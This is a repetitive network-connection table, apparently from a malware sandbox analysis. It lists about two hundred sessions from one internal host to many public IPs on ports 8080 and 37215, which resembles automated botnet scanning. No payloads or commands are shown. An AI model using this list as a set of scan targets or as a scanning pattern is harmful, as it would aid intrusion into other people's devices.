                                                        14256192.168.2.2335100109.250.165.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14257192.168.2.2343902140.39.110.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14258192.168.2.2341936177.130.4.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14259192.168.2.235256887.119.76.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14260192.168.2.236087258.113.74.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14261192.168.2.2353780159.177.99.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14262192.168.2.233317899.165.205.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14263192.168.2.2345790168.54.87.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14264192.168.2.235572054.35.168.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14265192.168.2.2338916109.217.82.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14266192.168.2.233338834.25.62.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14267192.168.2.2355378144.167.121.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14268192.168.2.233712475.115.198.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14269192.168.2.235081284.134.191.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14270192.168.2.2350990219.69.107.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14271192.168.2.234202652.248.8.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14272192.168.2.236002468.18.243.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14273192.168.2.2339660163.98.108.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14274192.168.2.235878823.163.237.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14275192.168.2.234797076.91.215.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14276192.168.2.233432262.79.255.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14277192.168.2.234448069.191.46.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14278192.168.2.2342442205.224.225.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14279192.168.2.236075232.187.208.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14280192.168.2.2358354222.245.218.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14281192.168.2.234953897.210.63.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14282192.168.2.235155471.41.55.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14283192.168.2.233846885.185.73.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14284192.168.2.2348186162.155.0.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14285192.168.2.2350396216.2.231.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14286192.168.2.235614060.198.89.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14287192.168.2.2341984223.254.171.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14288192.168.2.2337932205.164.250.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14289192.168.2.2344144124.196.68.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14290192.168.2.236069890.18.60.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14291192.168.2.2349886113.195.95.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14292192.168.2.2355098130.63.160.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14293192.168.2.2352818204.161.167.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14294192.168.2.235188894.102.38.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14295192.168.2.23561621.58.109.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14296192.168.2.233436446.224.97.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14297192.168.2.234369871.32.21.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14298192.168.2.2356780166.63.243.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14299192.168.2.235595461.45.211.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14300192.168.2.23398788.255.246.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14301192.168.2.235998851.208.115.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14302192.168.2.2352810128.64.15.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14303192.168.2.234755675.198.167.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14304192.168.2.2350648192.198.136.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14305192.168.2.2359836114.206.163.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14306192.168.2.2346600216.27.74.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14307192.168.2.2335718155.141.64.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14308192.168.2.2354784184.81.152.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14309192.168.2.235520690.40.24.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14310192.168.2.235104895.123.41.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14311192.168.2.2343822105.74.74.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14312192.168.2.23528509.144.97.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14313192.168.2.2333274162.88.36.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14314192.168.2.2345430213.214.135.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14315192.168.2.2360796155.194.149.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14316192.168.2.2344984163.244.255.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14317192.168.2.2358644161.228.111.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14318192.168.2.2341642203.103.252.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14319192.168.2.2336202178.27.134.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14320192.168.2.235781048.72.209.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14321192.168.2.2352922113.20.147.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14322192.168.2.2353646190.92.217.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14323192.168.2.2340274152.183.125.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14324192.168.2.235338497.239.140.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14325192.168.2.2350716122.35.204.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14326192.168.2.235467644.150.248.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14327192.168.2.2357632198.207.154.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14328192.168.2.2340998221.171.68.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14329192.168.2.2354770195.139.172.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14330192.168.2.2356712205.28.74.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14331192.168.2.2342730192.243.43.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14332192.168.2.2349550144.215.79.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14333192.168.2.2338366101.169.139.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14334192.168.2.235442453.121.48.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14335192.168.2.234697849.240.216.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14336192.168.2.2345864119.108.192.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14337192.168.2.234653074.104.88.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14338192.168.2.2354634207.221.32.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14339192.168.2.2357980221.48.246.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14340192.168.2.234423849.6.208.2048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14341192.168.2.2350910201.216.194.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14342192.168.2.2341094143.136.70.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14343192.168.2.2350856137.110.8.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14344192.168.2.234209271.204.197.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14345192.168.2.2360232169.92.155.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14346192.168.2.234082241.128.244.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14347192.168.2.235984039.136.118.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14348192.168.2.2336678107.102.61.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14349192.168.2.234017220.147.205.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14350192.168.2.2332872102.178.181.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14351192.168.2.2336556152.226.188.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14352192.168.2.2339088181.198.121.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14353192.168.2.2360572161.30.187.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14354192.168.2.234550825.254.139.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14355192.168.2.234050053.69.13.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14356192.168.2.2355664164.22.254.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14357192.168.2.2347624219.116.205.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14358192.168.2.2341562195.185.241.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14359192.168.2.2353134136.174.100.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14360192.168.2.2350626130.29.136.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14361192.168.2.234265687.126.117.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14362192.168.2.233550295.252.54.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14363192.168.2.2341022172.82.203.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14364192.168.2.233575057.237.227.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14365192.168.2.2347304197.48.45.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14366192.168.2.2358722196.224.82.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14367192.168.2.235964623.121.158.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14368192.168.2.233466663.204.67.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14369192.168.2.233790265.56.85.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14370192.168.2.2347632121.246.120.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14371192.168.2.235364014.216.100.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14372192.168.2.2352240203.113.201.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14373192.168.2.2355786123.1.56.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14374192.168.2.235664248.104.214.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14375192.168.2.2342918204.119.148.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14376192.168.2.2348824222.126.87.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14377192.168.2.235016450.1.143.1498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14378192.168.2.2336340125.38.101.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14379192.168.2.2339978168.140.206.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14380192.168.2.2348272157.78.202.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14381192.168.2.234619441.6.27.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14382192.168.2.2359054197.20.145.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14383192.168.2.2345948197.93.97.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14384192.168.2.2344494157.235.149.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14385192.168.2.2354570197.197.141.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14386192.168.2.235846641.104.179.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14387192.168.2.2337802197.247.154.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14388192.168.2.2333476197.119.4.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14389192.168.2.234586699.71.7.19537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14390192.168.2.2351716197.116.97.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14391192.168.2.234516841.107.144.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14392192.168.2.2349964197.188.97.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14393192.168.2.2341652197.220.92.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14394192.168.2.2348258157.154.228.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14395192.168.2.2356406197.93.173.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14396192.168.2.233285441.131.205.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14397192.168.2.2349290197.193.7.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14398192.168.2.2338572197.126.166.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14399192.168.2.2350564157.181.84.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14400192.168.2.2343386157.62.193.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14401192.168.2.234895841.193.43.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14402192.168.2.2345090197.145.103.9837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14403192.168.2.2350302197.0.163.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14404192.168.2.2344198157.224.47.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14405192.168.2.235365241.139.73.11537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14406192.168.2.2360576197.155.197.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14407192.168.2.2349958157.12.148.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14408192.168.2.2342608197.208.3.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14409192.168.2.235279641.66.87.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14410192.168.2.234986441.118.38.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14411192.168.2.234544897.173.31.18337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14412192.168.2.2334254197.89.125.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14413192.168.2.2340606151.206.249.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14414192.168.2.2355720157.175.85.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14415192.168.2.2351842157.217.65.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14416192.168.2.234083241.95.117.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14417192.168.2.2340450197.199.112.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14418192.168.2.235974041.198.130.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14419192.168.2.234010241.129.129.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14420192.168.2.235865823.58.55.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14421192.168.2.2352646157.167.167.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14422192.168.2.233725041.2.40.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14423192.168.2.2342852157.180.145.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14424192.168.2.2342332197.135.45.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14425192.168.2.2355864157.114.173.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14426192.168.2.2351446157.103.163.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14427192.168.2.2336280197.202.208.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14428192.168.2.2349624157.155.52.13937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14429192.168.2.235012618.222.185.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14430192.168.2.2351498157.107.193.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14431192.168.2.234340214.244.219.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14432192.168.2.2351450197.27.188.11437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14433192.168.2.234532041.11.170.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14434192.168.2.2354894197.150.64.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14435192.168.2.234152041.58.225.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14436192.168.2.2335698157.66.155.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14437192.168.2.2355750197.145.36.19237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14438192.168.2.2343310157.217.101.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14439192.168.2.235276858.214.219.1137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14440192.168.2.233802481.67.99.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14441192.168.2.2342186157.106.103.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14442192.168.2.2347414110.194.120.19437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14443192.168.2.235255272.241.254.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14444192.168.2.2360504157.175.27.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14445192.168.2.2356234157.220.190.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14446192.168.2.234856841.15.215.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14447192.168.2.2338692221.110.198.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14448192.168.2.2346284157.34.238.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14449192.168.2.2343952197.49.41.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14450192.168.2.233836638.14.140.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14451192.168.2.2334780141.125.240.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14452192.168.2.235045841.196.121.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14453192.168.2.2345832157.167.28.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14454192.168.2.2357056195.242.126.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14455192.168.2.2353608157.228.99.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14456192.168.2.2354738157.0.156.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14457192.168.2.2348026157.72.177.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14458192.168.2.233779258.105.179.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14459192.168.2.233361641.192.173.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14460192.168.2.233554841.251.242.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14461192.168.2.2339198167.153.21.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14462192.168.2.2348888157.222.190.22137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14463192.168.2.2356460157.180.154.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14464192.168.2.235313641.158.172.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        14465192.168.2.235463241.155.242.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
